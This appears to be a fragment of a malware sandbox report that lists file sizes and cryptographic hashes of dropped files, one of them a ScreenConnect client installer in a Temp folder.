SHA1 ea0215721f66a93d67019d11c4e588a547cc2ad6
SHA256 d727a640723d192aa3ece213a173381682041cb28d8bd71781524dbae3ddbf62
SHA512 650d4320d9246aaecd596ac8b540bf7612ec7a8f60ecaa6e9c27b547b751386222ab926d0c915698d0bb20556475da507895981c072852804f0b42fdda02b844

Filesize 1.6MB
MD5 9ad3964ba3ad24c42c567e47f88c82b2
SHA1 6b4b581fc4e3ecb91b24ec601daa0594106bcc5d
SHA256 84a09ed81afc5ff9a17f81763c044c82a2d9e26f852de528112153ee9ab041d0
SHA512 ce557a89c0fe6de59046116c1e262a36bbc3d561a91e44dcda022bef72cb75742c8b01bedcc5b9b999e07d8de1f94c665dd85d277e981b27b6bfebeaf9e58097

C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi
Filesize 12.8MB
MD5 24579e5a1a15783455016d11335a9ab2
SHA1 fde36a6fbde895ba1bb27b0784900fb17d65fbbd
SHA256 9e8537945eae78cfa227cc117e5d33ea7854e042ec942d9523b5a08c45068dc1
SHA512 1b54f5d169b1d4b91643633cef2af6eca945c2517ba69b820751f1bb32c33e6e0390afa7ddf20097472ce9c4716f85138c335652aa061491398e0c1136b60709

Filesize 1KB
MD5 a10f31fa140f2608ff150125f3687920
SHA1 ec411cc7005aaa8e3775cf105fcd4e1239f8ed4b
SHA256 28c871238311d40287c51dc09aee6510cac5306329981777071600b1112286c6
SHA512 cf915fb34cd5ecfbd6b25171d6e0d3d09af2597edf29f9f24fa474685d4c5ec9bc742ade9f29abac457dd645ee955b1914a635c90af77c519d2ada895e7ecf12

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 202KB
MD5 ba84dd4e0c1408828ccc1de09f585eda
SHA1 e8e10065d479f8f591b9885ea8487bc673301298
SHA256 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA512 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

Filesize 144KB
MD5 cc36e2a5a3c64941a79c31ca320e9797
SHA1 50c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA256 6fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
SHA512 fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0

Filesize 1.0MB
MD5 971b0519b1c0461db6700610e5e9ca8e
SHA1 9a262218310f976aaf837e54b4842e53e73be088
SHA256 47cf75570c1eca775b2dd1823233d7c40924d3a8d93e0e78c943219cf391d023
SHA512 d234a9c5a1da8415cd4d2626797197039f2537e98f8f43d155f815a7867876cbc1bf466be58677c79a9199ea47d146a174998d21ef0aebc29a4b0443f8857cb9